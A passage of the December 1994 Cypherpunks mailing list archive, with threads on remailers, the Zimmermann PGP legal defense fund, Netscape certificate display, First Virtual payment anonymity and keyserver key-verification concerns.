\" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

From eric at remailer.net Wed Dec 14 17:18:09 1994
From: eric at remailer.net (Eric Hughes)
Date: Wed, 14 Dec 94 17:18:09 PST
Subject: rad
In-Reply-To: <9412150959.ZM11151@wiley.sydney.sgi.com>
Message-ID: <199412150215.SAA05286@largo.remailer.net>

   From: "Ian Farquhar"

   The main reason why no one from the NSA comments is simply because there is a perception that anything they say will be taken as NSA policy, disclaimers notwithstanding.

Sounds like a job for a remailer.

Eric

From tcmay at netcom.com Wed Dec 14 18:11:19 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Wed, 14 Dec 94 18:11:19 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <199412142156.PAA00947@pentagon.io.com>
Message-ID: <199412150210.SAA05624@netcom7.netcom.com>

Notice: MPEG-II Video Mail Attached: Quicktime 2.1-compatible.

This message has been formatted as a HyperMIME document. Do not attempt to read it on a non-HyperMIME-compliant system.

ASCII-only portion--hit "n" to download the MPEG-II attachment, hit "^&-D" to stop the automatic transfer which has already begun, hit "##23" to receive a QuarkExpress document describing how to use HyperMIME.

If you see garbage characters below, in the ASCII portion of this message, it means you are not on the bleeding edge of technology.

Fij4 at Jim McCoy 89g1~wroteiio900deW:

ASCII Excerpt> tcmay at netcom.com (Timothy C. May) writes:
ASCII Excerpt> [...]
ASCII Excerpt> > This is not a flame, but there sure has been an increase in the
ASCII Excerpt> > frequency of this strange MIME messages lately.
ASCII Excerpt>
ASCII Excerpt> Probably because that is the direction mail is going. If you can't do it
ASCII Excerpt> too bad, but don't expect everyone else to wait around for you to catch
ASCII Excerpt> up. Time to move your mail into the early 90s and get a MIME-aware mail
ASCII Excerpt> agent...
ASCII Excerpt>
ASCII Excerpt> jim

FG00998Thanks, Jim, I think you're right. This parochial dependency on archaic things like ASCII and the sentimental attachment we have to 80-column displays is keeping us from advancing.

(You'll know you're stuck in the 80-column swamp if the quoted message above overran your display...me, I am switching to a 120-column mode soon, and may adopt a 1280 x 1024 dual column format for all of my messages. If you can't read it, time to move your mail into the early 90s!

NOTICE: The JPEG-II movie that accompanies this message has been installed in your root directory. It can be viewed with the HyperMIMEPlayer software, version 1.04 (but don't use 1.03 or earlier, as that will crash your system!). The .WAV files can be listened to with version 4.2 or later MIMEaural players.

The Singularity is approaching...soon we'll be changing our system software every few days to keep up with the incompatible messages being sent.

I love it.

[Tim May's ASCII sig has been replaced by a more modern Postscript version, which was downloaded while you were reading this message and sent directly to your laser printer. All part of HyperMIME making your life easier.]

From sandfort at crl.com Wed Dec 14 18:43:20 1994
From: sandfort at crl.com (Sandy Sandfort)
Date: Wed, 14 Dec 94 18:43:20 PST
Subject: THROUGH THE LOOKING GLASS
In-Reply-To:
Message-ID:

C'punks,

I'm coming to you through the magic of telnet. Boy, am I swimming in the deep end. I haven't even figured out how to download, compose offline, upload and transmit.
I'll figure that out tomorrow. In the meantime:

On Wed, 14 Dec 1994, Bob Snyder wrote:

> ...
> I really don't want to know how many sips it takes an officer to finish a cup of coffee, or if the officer has a genital itch problem while sitting in a speed trap. I think this crosses the line.

I don't want to know either, so I'll just ignore that part. Feel free to do the same.

> And where do we stop? Do we wire other federal employees?...

Good suggestion, Bob.

S a n d y

From jdblair at nextsrv.cas.muohio.edu Wed Dec 14 20:40:53 1994
From: jdblair at nextsrv.cas.muohio.edu (jdblair at nextsrv.cas.muohio.edu)
Date: Wed, 14 Dec 94 20:40:53 PST
Subject: 1984 T-shirt news
Message-ID: <9412150445.AA08615@nextsrv.cas.muohio.edu>

-----BEGIN PGP SIGNED MESSAGE-----

More news about the 1984 NSA Shirt:

A while ago, David Morrison, of the National Journal (a weekly political commentary journal) contacted me about the 1984 shirt. It turns out somebody else had been wearing one around the office, and he liked the design. He bought one from me, and asked me to send him some information about the clipper issue. I packed up a shirt, printed out various articles on both sides of the clipper issue (mostly from the cp archive) wrote up a short summary of each, and included a bit of my own views on the issue. I also included a copy of Tim May's FAQ on a 3.5 inch disk.

At any rate, yesterday in the mail I received two copies of the Dec. 10, 1994 National Journal. On p. 2883 (the very first non-advertising page), at the bottom, a box contained a picture of the shirt, w/ the headline "Looks Like a Cheap Chip Shot." The brief text reads:

More on the "Clipper" chip, the eavesdroppable encryption key pushed by the National Security Agency: Hearing an NSA spook jest that Big Brother was running 10 years behind schedule, John D. Blair of Cypherpunks, an anarcho-libertarian Internet group--designed the eye-catching T-shirt at left. "My feelings about its illegitimacy are pretty strong," said Blair, who has sold 250 of the anti-chip shirts on the Net. NSA chief counsel Stewart A. Baker raps Clipper criticism as "the long delayed revenge of people who couldn't go to Woodstock because they had too much trig homework."

I don't think the NSA spook part is fair to Kenneth Olthaff, the spook that inspired the shirt. Too bad he didn't include my e-mail address, as well ;)

Seriously, though, I've found the shirt has been a good way to get people talking about Clipper, and related issues, here at super-conservative, very pro establishment Miami University (Oxford, OH). It's created some inquiry where people had no idea there was even anything to inquire about (or have even heard of the NSA in the first place). If any of you want to resell them, e-mail me and we can work out a deal that makes it worth your time, as well as spread the word about Clipper.

The crude web page is still in place with basic info at: http://nextsrv.cas.muohio.edu/t-shirt

later,
- -john.
- --------------------------------------------------------------------------
John Blair: voice: (513) 529-3980
http://nextsrv.cas.muohio.edu/~jdblair    85 81 F8 16 12 97 4C 68
Unix System Administrator, Juggler    A1 A0 40 95 BF 03 60 E1
Student of Interdisciplinary Studies    (finger me for PGP key)

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

From hmiller at orion.it.luc.edu Wed Dec 14 21:07:04 1994
From: hmiller at orion.it.luc.edu (Hugh Miller)
Date: Wed, 14 Dec 94 21:07:04 PST
Subject: Zimmermann Defense Fund Appeal
Message-ID: <9412150506.AA42667@orion.it.luc.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Phil Zimmermann Legal Defense Fund Appeal

In November, 1976, Martin Hellman and Whitfield Diffie announced their discovery of public-key cryptography by beginning their paper with the sentence: "We stand today on the brink of a revolution in cryptography."

We stand today on the brink of an important battle in the revolution they unleashed. Philip Zimmermann, who encoded and released the most popular and successful program to flow from that discovery, Pretty Good Privacy ("PGP"), may be about to go to court.

It has been over fourteen months now since Phil was first informed that he was the subject of a grand jury investigation being mounted by the San Jose, CA, office of US Customs into the international distribution, over the Internet, of the original version of the program. On January 12th, Phil's legal team will meet for the first time with William Keane, Assistant US Attorney for the Northern District of California, who is in charge of the grand jury investigation, in San Jose. An indictment, if one is pursued by the government after this meeting, could be handed down very shortly thereafter.

If indicted, Phil would likely be charged with violating statute 22 USC 2778 of the US Code, "Control of arms exports and imports." This is the federal statute behind the regulation known as ITAR, "International Traffic in Arms Regulations," 22 CFR 120.1 et seq. of the Code of Federal Regulations. Specifically, the indictment would allege that Phil violated 22 USC 2778 by exporting an item listed as a "munition" in 22 CFR 120.1 et seq. without having a license to do so. That item is cryptographic software -- PGP.

At stake, of course, is far more than establishing whether Phil violated federal law or not. The case presents significant issues and will establish legal precedent, a fact known to everyone involved. According to his lead counsel, Phil Dubois, the US government hopes to establish the proposition that anyone having anything at all to do with an illegal export -- even someone like Phil, whose only involvement was writing the program and making it available to US citizens and who has no idea who actually exported it -- has committed a federal felony offense. The government also hopes to establish the proposition that posting a "munition" on a BBS or on the Internet is exportation. If the government wins its case, the judgment will have a profound chilling effect on the US software industry, on the free flow of information on the emerging global networks, and in particular upon the grassroots movement to put effective cryptography in the hands of ordinary citizens. The US government will, in effect, resurrect Checkpoint Charlie -- on the Information Superhighway.

By now, most of us who are reading this know about Phil and the case, whether by having the program and reading the doc files or by seeing reports in the Wall Street Journal, Time, Scientific American, the New York Times, Wired, US News and World Report, and hundreds of other news outlets; on Usenet groups like talk.crypto.politics or alt.security.pgp; or by listening to Phil give talks such as the one he gave at CFP '94 in Chicago. We know that PGP has made great strides since version 1.0, and is now a sophisticated encryption and key-management package which has become the de facto standard in both micro and mainframe environments. We know that Phil and the PGP development team successfully negotiated a commercial license with Viacrypt, and, through the efforts of MIT, a noncommercial license for PGP with RSA Data Security, the holders of the patent on the RSA algorithm on which PGP is based, thus freeing the program from the shadow of allegations of patent infringement. We know that programs such as PGP represent one of our best bulwarks in the Information Age against the intrusions of public and private information gatherers. We know that PGP is a key tool in insuring that the "Information Superhighway" will open the world to us, without opening us to the world.

What we may not all know is the price Phil has had to pay for his courage and willingness to challenge the crypto status quo. For years now Phil has been the point man in the ongoing campaign for freely available effective cryptography for the everyday computer user. The costs, personal and professional, to him have been great. He wrote the original code for PGP 1.0 by sacrificing months of valuable time from his consulting career and exhausting his savings. He continues to devote large amounts of his time to testifying before Congress, doing public speaking engagements around the world, and agitating for "cryptography for the masses," largely at his own expense.
He is now working, still for free, on the next step in PGP technology, PGP Phone, which will turn every PC with a sound card and a modem into a secure telephone. And we know that, just last month, he was searched and interrogated in the absence of counsel by US Customs officials upon his return from a speaking tour in Europe.

Phil's legal team consists of his lead counsel, Philip Dubois of Boulder, CO; Kenneth Bass of Venable, Baetjer, Howard & Civiletti, in Washington, DC, first counsel for intelligence policy for the Justice Department under President Carter; Eben Moglen, professor of law at Columbia and Harvard Universities; Curt Karnow, a former assistant US attorney and intellectual property law specialist at Landels, Ripley & Diamond in San Francisco; and Thomas Nolan, noted criminal defense attorney in Menlo Park.

While this is a stellar legal team, what makes it even more extraordinary is that several of its members have given their time for free to Phil's case. Still, while their time has been donated so far, other expenses -- travel, lodging, telephone, and other costs -- have fallen to Phil. If the indictment is handed down, time and costs will soar, and the members of the team currently working pro bono may no longer be able to. Justice does not come cheap in this country, but Phil deserves the best justice money can buy him.

This is where you and I come in. Phil Dubois estimates that the costs of the case, leaving aside the lawyers' fees, will run from US$100,000 - $150,000. If Phil's team must charge for their services, the total cost of the litigation may range as high as US$300,000. The legal defense fund is already several thousand dollars in the red and the airline tickets to San Jose haven't even been purchased yet.

In September, 1993 I wrote a letter urging us all to support Phil, shortly after the first subpoenas were issued by Customs. Today the need is greater than ever, and I'm repeating the call.

Phil has assumed the burden and risk of being the first to develop truly effective tools with which we all might secure our communications against prying eyes, in a political environment increasingly hostile to such an idea -- an environment in which Clipper chips and digital telephony bills are our own government's answer to our concerns. Now is the time for us all to step forward and help shoulder that burden with him.

It is time more than ever. I call on all of us, both here in the US and abroad, to help defend Phil and perhaps establish a groundbreaking legal precedent. PGP now has an installed base of hundreds of thousands of users. PGP works. It must -- no other "crypto" package, of the hundreds available on the Internet and BBS's worldwide, has ever been subjected to the governmental attention PGP has. How much is PGP worth to you? How much is the complete security of your thoughts, writings, ideas, communications, your life's work, worth to you? The price of a retail application package? Send it. More? Send it. Whatever you can spare: send it.

A legal trust fund, the Philip Zimmermann Defense Fund (PZDF), has been established with Phil Dubois in Boulder. Donations will be accepted in any reliable form, check, money order, or wire transfer, and in any currency, as well as by credit card.

You may give anonymously or not, but PLEASE - give generously. If you admire PGP, what it was intended to do and the ideals which animated its creation, express your support with a contribution to this fund.

* * *

Here are the details:

To send a check or money order by mail, make it payable, NOT to Phil Zimmermann, but to "Philip L. Dubois, Attorney Trust Account." Mail the check or money order to the following address:

Philip Dubois
2305 Broadway
Boulder, CO USA 80304
(Phone #: 303-444-3885)

To send a wire transfer, your bank will need the following information:

Bank: VectraBank
Routing #: 107004365
Account #: 0113830
Account Name: "Philip L. Dubois, Attorney Trust Account"

Now here's the neat bit. You can make a donation to the PZDF by Internet mail on your VISA or MasterCard. Worried about snoopers intercepting your e-mail? Don't worry -- use PGP.

Simply compose a message in plain ASCII text giving the following: the recipient ("Philip L. Dubois, Attorney Trust Account"); the bank name of your VISA or MasterCard; the name which appears on it (yours, hopefully :-)); a telephone number at which you can be reached in case of problems; the card number; date of expiry; and, most important, the amount you wish to donate. (Make this last item as large as possible.) Then use PGP to encrypt and ASCII-armor the message using Phil Dubois's public key, enclosed below. (You can also sign the message if you like.) E-mail the output file to Phil Dubois (dubois at csm.org). Please be sure to use a "Subject:" line reading something like "Phil Zimmermann Defense Fund" so he'll know to decrypt it right away.

Here is Phil Dubois's public key:

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.7
- -----END PGP PUBLIC KEY BLOCK-----

* * *

This campaign letter will be posted in a number of Usenet groups. I will also be turning it into a FAQ-formatted document, which will be posted monthly in the relevant groups and which will be available by anonymous ftp from ftp://ftp.math.luc.edu/pub/hmiller/PGP/pzdf.FAQ.
If you come upon, or up with, any other ways in which we can help raise funds for Phil, drop me a line at hmiller at luc.edu and let me know, so that I can put it in the FAQ.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

--
Hugh Miller, Ph.D.    Voice: 312-508-2727
Asst. Professor of Philosophy    FAX: 312-508-2292
Loyola University Chicago    Home: 312-338-2689
6525 N. Sheridan Rd.    E-mail: hmiller at luc.edu
Chicago, IL 60626    WWW: http://www.luc.edu/~hmiller
PGP Public Key 4793C529: FC D2 08 BB 0C 6D CB C8 0B F9 BA 55 62 19 40 21

From unicorn at access.digex.net Wed Dec 14 21:11:45 1994
From: unicorn at access.digex.net (Black Unicorn)
Date: Wed, 14 Dec 94 21:11:45 PST
Subject: rad
In-Reply-To: <9412142136.AA05403@komets.k12.cfa.org>
Message-ID:

On Sat, 13 Nov 1993 ndibble at komets.k12.cfa.org wrote:

> I wish the NSA executives would come out of the closet... > It's warm in here.

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!

From hfinney at shell.portal.com Wed Dec 14 23:38:27 1994
From: hfinney at shell.portal.com (Hal)
Date: Wed, 14 Dec 94 23:38:27 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <199412142236.OAA21214@jobe.shell.portal.com>
Message-ID: <199412150738.XAA06251@jobe.shell.portal.com>

Hal writes:

>It appears from your docs that the Netscape client has a File menu item that brings up a Document Information dialog box which displays the distinguished names of the certificate issuer and of the subject (the owner of the key). This does provide a way of checking that you are securely connected to the server that you expect (assuming that the name is recognizable to the user). But it sounds like this is not something which the customer sees automatically. Again, this seems like an important security aspect which should be displayed more prominently.

>BTW, what do you see in the dialog when you connect securely to mcom.com? What is the subject name in your certificate?

I downloaded the latest Netscape client and tried the https: links at the mcom server. When you switch to secure mode, a large dialog box appears reminding you to check the Document Information. But it has a "don't show again" button and I would imagine that most people would soon use that.

The Document Information box shows this information:

Encryption Key: Export [40]
Name of Server: C=US, ST=California, O=Netscape Communications Corp., CN=mosaic at mcom.com
Name of Certifier: C=US, OU=Test CA, O=Netscape Communications Corp.

It would be nice if the CN field were the same as the server address. Then the client could check it.

Hal

From Tony.Gurnick at nzdairy.co.nz Thu Dec 15 01:18:39 1994
From: Tony.Gurnick at nzdairy.co.nz (DNA)
Date: Thu, 15 Dec 94 01:18:39 PST
Subject: PGP 2.7
Message-ID: <94121518414205@nzdairy.co.nz>

I keep seeing pgp 2.7 in public key & sig blocks.
Where do we get it?

T

From anonymous-remailer at shell.portal.com Thu Dec 15 01:40:43 1994
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 15 Dec 94 01:40:43 PST
Subject: PGP 2.7
Message-ID: <199412150940.BAA12796@jobe.shell.portal.com>

--> I keep seeing pgp 2.7 in public key & sig blocks.
--> Where do we get it?

2.7 is a ViaCrypt product which you have to pay royalties for, and last I heard they didn't include sources with their distribution. Anybody know if they've started sending the sources with the executables??

Here's their addresses and tel #'s:

Mail: 9033 N. 24th Avenue Suite 7
Phoenix AZ 85021-2847
Phone: (602) 944-0773
Fax: (602) 943-2601
Internet: viacrypt at acm.org
Compuserve: 70304.41

From lmccarth at ducie.cs.umass.edu Thu Dec 15 01:43:21 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Thu, 15 Dec 94 01:43:21 PST
Subject: PGP 2.7
Message-ID: <199412150948.EAA29779@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

DNA writes:
> I keep seeing pgp 2.7 in public key & sig blocks.
> Where do we get it?

- - From ViaCrypt (cf. Mike Johnson's Where to Get PGP FAQ, which he coincidentally sent to the list yesterday)

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From shamrock at netcom.com Thu Dec 15 01:51:45 1994
From: shamrock at netcom.com (Lucky Green)
Date: Thu, 15 Dec 94 01:51:45 PST
Subject: Less Flaming, More Civility
Message-ID:

Tim wrote:
[...]
>Not all debate recently has been insulting, of course. In fact, most hasn't been. But the insulting tone persists in some of the thread titles, and in the generally adversarial nature. (If I were Marc A. or Kipp, I'd not feel very welcome here....a situation which is counterproductive to our presumed goals.)
[...]

I was quite surprised that they stayed that calm. MCOM's coming out on the list was rather painful. Glad to have them here, though. I always looked at the list as a place to learn.
Past mistakes notwithstanding, they do seem to be willing to learn.

>So, this is my little rant on "Can't we all just get along?" expressed in a different way.
>

There is nothing gained by flaming someone. Even if one thinks that they deserve it. Let's not alienate people that come to us to be educated. This would be self defeating.

>The Cypherpunks list has become one of several de facto "watering holes" where diverse participants interact. Let's not blow it.

C'punks, when this list started we were a bunch of idealistic privacy freaks. Look who's on the list now: the developers of cutting edge Internet software. They came here because they heard our message. What did Amanda say? Something like "I come here because that's where the ideas are". We have the chance to influence the shape of the Net for years to come.

The MCOM folks didn't go to the IETF meeting? Send them an invite for the next one. They never heard of ISIP? Send them a demo and docs. Let's show a "If you have any questions don't hesitate to ask us." attitude.

-- Lucky Green
PGP encrypted mail preferred.

From nobody at jpunix.com Thu Dec 15 03:25:31 1994
From: nobody at jpunix.com (Anonymous)
Date: Thu, 15 Dec 94 03:25:31 PST
Subject: Zimmermann Defense Fund Appeal
Message-ID: <199412151124.FAA22497@jpunix.com>

On Wed, 14 Dec 1994, Hugh Miller wrote:

> [...]
> Phil deserves the best justice money can buy him.

So this is the current state of your legal system. Oh dear.

From dmandl at panix.com Thu Dec 15 03:45:20 1994
From: dmandl at panix.com (David Mandl)
Date: Thu, 15 Dec 94 03:45:20 PST
Subject: Question for remailer operators
Message-ID: <199412151145.AA14916@panix.com>

For the anon remailer operators out there:

I'm looking for figures on the average number of messages that pass through the different remailers a day (or week, or whatever). This is for an article I'm working on to be published in a local paper here in NYC. I'd appreciate any numbers I can get from any of you.
Estimates are fine if you don't have exact figures.

(Sorry to spam the list like this. It's just that I'm sure my list of remailers is very out of date, and even if it's not, I wouldn't know how to reach the operators of most of them.)

Many thanks.

--Dave.

--
Dave Mandl
dmandl at panix.com

From mbelow at HRZ.Uni-Bielefeld.DE Thu Dec 15 04:41:42 1994
From: mbelow at HRZ.Uni-Bielefeld.DE (Michael Below)
Date: Thu, 15 Dec 94 04:41:42 PST
Subject: Question for remailer operators
In-Reply-To: <199412151145.AA14916@panix.com>
Message-ID: <199412151241.AA168845284@dee.hrz.uni-bielefeld.de>

Hi!

Dave Mandl wrote:

> I'm looking for figures on the average number of messages that pass through the different remailers a day (or week, or whatever). This is for an article I'm working on to be published in a local paper here in NYC. I'd appreciate any numbers I can get from any of you. Estimates are fine if you don't have exact figures.

I'm interested in these figures, too, since I'm currently trying to set up a remailer at our local computing centre -- the first argument against it was the lack of bandwidth, since the whole university is using two 64 kBit lines and these guys hope to get a 2 MBit line if they say "no" often enough... It would be great if you could also give me some figures to compare with, f.e. something like "using WWW for one hour equals one day of normal remailer operation" (blind guess).

And, last question: Is there some sort of a FAQ or HOWTO "How to convince operators of the necessity / usefulness / non-evilness of anonymous remailers"?
^ ^ ^ ^ ^ ^ (Is this a proper English word?)

Since this is my first posting to this list, I'll say something about myself: I'm studying Sociology and Law at the Universitaet Bielefeld / Germany and sit too much in front of computers/X-Terminals. I'm not good at programming and no mathematical genius (or whatever a Cypherpunk should be) -- I'm rather generally interested in security and using cryptography.
Currently I'm trying to translate the docs for SFS, but I'm not too fast at that...

-Michael

From nsb at nsb.fv.com Thu Dec 15 05:05:50 1994
From: nsb at nsb.fv.com (Nathaniel Borenstein)
Date: Thu, 15 Dec 94 05:05:50 PST
Subject: properties of FV
In-Reply-To: <199412141644.IAA04167@largo.remailer.net>
Message-ID: <8iw3vJ70Eyt5JL_jUv@nsb.fv.com>

Excerpts from fv: 14-Dec-94 properties of FV eric at remailer.net (3093)

> There are two forms of anonymity: counterparty anonymity and issuer anonymity. FV claims the first but not the second. "Far from anonymous" may be a little confusing, but it's certainly far from completely anonymous.

Thanks for introducing the useful terminology. You're right, FV provides counterparty anonymity but not issuer anonymity. A useful clarification.

>    Wrong again. We explicitly permit seller-based accumulation, [...]
>
> Net clearing of this form requires the creation of an entire billing system for small value which then settles through FV. The very nature of such a net billing system requires linkability of transaction to transaction, or in other words generates identity. So FV is unsuitable for small value anonymous transactions.

No, it doesn't require an entire billing system, because it lives entirely on the seller's machine and does nothing except the pre-billing accumulation for a single seller. It requires a simple database and a nightly cron job. The next time I have a day or two free I will probably build such a thing and add it to the free FV software; I don't expect it will be more than a day or two's work, if that.

>    We expect to make our money on information products, not on the commerce engine.
>
> At 29 cents plus 4% per settlement transaction, I find this comment disingenuous in the extreme, even after paying Visa for settlement.

Well, at 29+4% it would indeed be disingenuous. However, that's not what we're charging -- I'd encourage you to actually read our materials.
We're charging 29 cents plus 2%, and this includes all the charges to the credit card networks, the banks, and our financial transaction processors. We are NOT operating on a big margin here.

> So if you're planning on removing the cumbersomeness of your current protocol with software, why is it that you don't have an option to turn on crypto, whose cumbersomeness can also be mitigated with software?

As I said in an earlier post this morning, this *is* an option we will probably support eventually, although I don't think it is as easy to make crypto easy-to-use as it is to make checkboxes easy-to-use, at least not without deeply compromising the security of the crypto system. Mostly, however, we just think that it's a longer-term problem, because we see the widespread deployment of crypto as being a longer-term phenomenon.

-- Nathaniel

From storm at marlin.ssnet.com Thu Dec 15 05:37:11 1994
From: storm at marlin.ssnet.com (Don Melvin)
Date: Thu, 15 Dec 94 05:37:11 PST
Subject: Zimmermann Defense Fund Appeal
In-Reply-To: <199412151124.FAA22497@jpunix.com>
Message-ID: <9412151334.AA02326@marlin.ssnet.com>

The wise _Anonymous_ is known to have said...
>
> On Wed, 14 Dec 1994, Hugh Miller wrote:
>
> > [...]
> > Phil deserves the best justice money can buy him.
>
> So this is the current state of your legal system. Oh dear.

Yes, as a matter of fact it is. We have a _legal_ system now, not a _Justice_ system. If it was a Justice system, this more than likely wouldn't be happening.

What system do you use?

--
America - a country so rich and so strong we can reward the lazy and punish the productive and still survive (so far)
Don Melvin storm at ssnet.com finger for PGP key.
From ddt at lsd.com Thu Dec 15 06:55:18 1994 From: ddt at lsd.com (ddt at lsd.com) Date: Thu, 15 Dec 94 06:55:18 PST Subject: No Subject Message-ID: X-PGP Key ID: 4AAF00E5 X-PGP Fprint: 30D81F3484E6A83F 6EC8D7F0CAB3D265 Date: Thu, 15 Dec 1994 06:55:23 -0800 To: cypherpunks at toad.com From: ddt at lsd.com (Dave Del Torto) Subject: KEYSRVR: tabula rasa? Cc: Philip Zimmermann , Michael Graff -----BEGIN PGP SIGNED MESSAGE----- [parts from a separate thread w/ Derek] Why is it possible for someone other than ME to add MY key to a keyserver? I realize that at some point (perhaps only the first time you submit a key?), there has to be some trust model employed, but it seems like this anyone-can-submit-anyone-else's-key situation offers a very obvious attack: anyone could propagate bogus keys across the net by just generating bogus keys with someone else's email/name on them, leading to massive impersonation problems. Maybe I'm missing something obvious, but it seems like there should be a more rigorous method available to, and employed by, keyserver operators for verifying someone's identity before accepting a key submitted (supposedly) by them. Shouldn't the key submission msg itself at minimum be required to be contained within a signed msg from someone with enough "nearness" in trust levels from some trusted introducer known to the keyserver op? I thought this sort of situation was precisely the reason for the trust level system in PGP in the first place. This may be a can of worms (or not), but if cpunks require fairly decent methods for verifying the identities of people who want to trade keys with them personally, then it seems keyservers should require at LEAST that level of verification (or better). I'd like to CLEAR/REMOVE ALL keys from ALL keyservers that are: - attributed to me by others (without my knowledge) - added by others (unknown to me) - purporting to have been generated by me) and start with a tabula rasa. 
Maybe in a few weeks, once all these (what I consider to be) bogus keys are GONE, I can add my actual key to a keyserver. There doesn't seem to be any elegant mechanism available for doing this yet, but I'm ready to be educated on this point. Any comments? dave -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBLvANraHBOF9KrwDlAQGVDwQAs4/OuwICvnl+hHpatlcpp8o7MrF21x9f 4SJd0NUJ/koa648bDwr0qxyhs7NSwon2jU4FPI/QBPVAcrsSAMkfXWr2NpF6pOlV TIFIQ9xouT9RP7KT86bU0EiU3RQsO3q8LJRjylWOA2zBEYC+b7Ah5ALfZ/tng293 wE8W2E/rxl0= =64dw -----END PGP SIGNATURE----- From joshua at dee.retix.com Thu Dec 15 07:25:06 1994 From: joshua at dee.retix.com (joshua geller) Date: Thu, 15 Dec 94 07:25:06 PST Subject: Zimmermann Defense Fund Appeal In-Reply-To: <199412151124.FAA22497@jpunix.com> Message-ID: <199412151526.HAA05726@sleepy.retix.com> > On Wed, 14 Dec 1994, Hugh Miller wrote: > > [...] > > Phil deserves the best justice money can buy him. > So this is the current state of your legal system. Oh dear. this has always been the state of the american, and as far as I know of all legal systems. josh From eric at remailer.net Thu Dec 15 07:39:41 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 15 Dec 94 07:39:41 PST Subject: properties of FV In-Reply-To: <8iw3vJ70Eyt5JL_jUv@nsb.fv.com> Message-ID: <199412151637.IAA06386@largo.remailer.net> > Net clearing of this form requires the creation of an entire billing > system for small value which then settles through FV. No, it doesn't require an entire billing system, because it lives entirely on the seller's machine and does nothing except the pre-billing accumulation for a single seller. Just because it's all on one machine doesn't make it not a billing system. If it does "nothing except pre-billing", then it doesn't have the ability to tie into FV. Such an "accumulation system" has all the properties of a standard billing system. 
It has accounts which accumulate claims, it periodically asks the customer to pay off liabilities, and it must check that payment has actually been made. Just because the values are small, the process is partially automated, and it all happens much quicker does not prevent it from being a billing system. Personally, I'd call it a receivables system, because that's much closer to existing terminology for the actual accounting function. I'm not trying to imply that you couldn't cobble something up fairly quickly, but I have my doubts that a good quick hack will scale appropriately for even a modest sized operation. > The very nature > of such a net billing system requires linkability of transaction to > transaction, or in other words generates identity. So FV is > unsuitable for small value anonymous transactions. I would still like you to address this issue, if only to acknowledge the above characterization. > At 29 cents plus 4% per settlement transaction, I find this comment > disingenuous in the extreme, even after paying Visa for settlement. We're charging 29 cents plus 2%, and this includes all the charges to the credit card networks, the banks, and our financial transaction processors. We are NOT operating on a big margin here. As I had recalled from reading your materials, you were charging 29 cents plus 2% on one leg of the transaction plus an additional 2% on the other. Rereading, this is not the case. Am I remembering a previous situation? As I said in an earlier post this morning, this *is* an option we will probably support eventually, although I don't think it is as easy to make crypto easy-to-use as it is to make checkboxes easy-to-use, at least not without deeply compromising the security of the crypto system. Partial security is better than no security. Deep compromises only happen if your expectations of the crypto system are larger than deserved. If all you expect is a partial solution, other aspects of the cryptography fall away. 
Just because crypto _can_ do more than one might use it for is no argument for getting _some_ benefit out of it. You've not seen this recently on cypherpunks, but I've been stressing recently the need to deploy partial solutions. Roughly speaking, crypto is good for transit security and storage security. The primary security problem with FV is transit security, not storage security. This is a known solved problem. There are issues of security of private keys stored on Internet machines. Were possession of such a key required in order to crack the system, however, it would be _in addition_ to everything else already required. To mitigate key storage risk I would recommend a key generated entirely and only for use with FV. One of the underlying conceptual problems with allowing a key to be at risk is some sort of belief that compromises of secret keys should never ever EVER be allowed to happen. This is ludicrous. When the benefit of the use of a private key means that it might be compromised, don't rely upon its not being compromised. In particular, if a digital signature does not, by agreement, carry an implied warranty of identity, then there's no problem at all. Use the crypto entirely for transit security. If someone hacks your machine and grabs your passphrase and forges a transaction, at least the intruder has to grab your passphrase. Eric From eric at remailer.net Thu Dec 15 07:52:11 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 15 Dec 94 07:52:11 PST Subject: FV fine print Message-ID: <199412151649.IAA06409@largo.remailer.net> In looking over the FV docs, I found the following interesting tidbit. ---------------------- * YOU shall retain computer data of all sales for at least three years from the date of the transaction. In the event you are not able to store such information, you may contact infohaus-info at fv.com to make storage arrangements. ---------------------- Interpretation is left to the reader. 
Eric From bdolan at use.usit.net Thu Dec 15 07:59:43 1994 From: bdolan at use.usit.net (Brad Dolan) Date: Thu, 15 Dec 94 07:59:43 PST Subject: Less Flaming, More Civility In-Reply-To: <199412142057.MAA00850@netcom9.netcom.com> Message-ID: On Wed, 14 Dec 1994, Timothy C. May wrote: > > A minor correction, when I wrote: > > > > It may be that the comments made here about the security model of > > Netscape and First Virtual are on the mark, that these models need a > > lot more work. But I don't know see how insults or derision, or > > imputing bad motives to these folks, will help. (I think I was careful > > this past motive to avoid slinging mud at Bill Gates, for example, > ^^^^^^ > > during the debate about reports that Microsoft could be including some > > form of key escrow in future OS releases. Not to say I've never > > flamed...) > > I meant to say "this past summer." > > --Tim > > > -- > ......................................................................... From hfinney at shell.portal.com Thu Dec 15 08:08:42 1994 From: hfinney at shell.portal.com (Hal) Date: Thu, 15 Dec 94 08:08:42 PST Subject: Question for remailer operators In-Reply-To: <199412151145.AA14916@panix.com> Message-ID: <199412151608.IAA00109@jobe.shell.portal.com> I see about 200 messages a day through my remailer, sizes averaging a couple of K. I had the impression at one point that the VAST majority of this was "cover" traffic that someone is generating just to keep the network busy. I don't know if this is still the case. It might be possible to opt out of the cover traffic generator to reduce your load to a politically 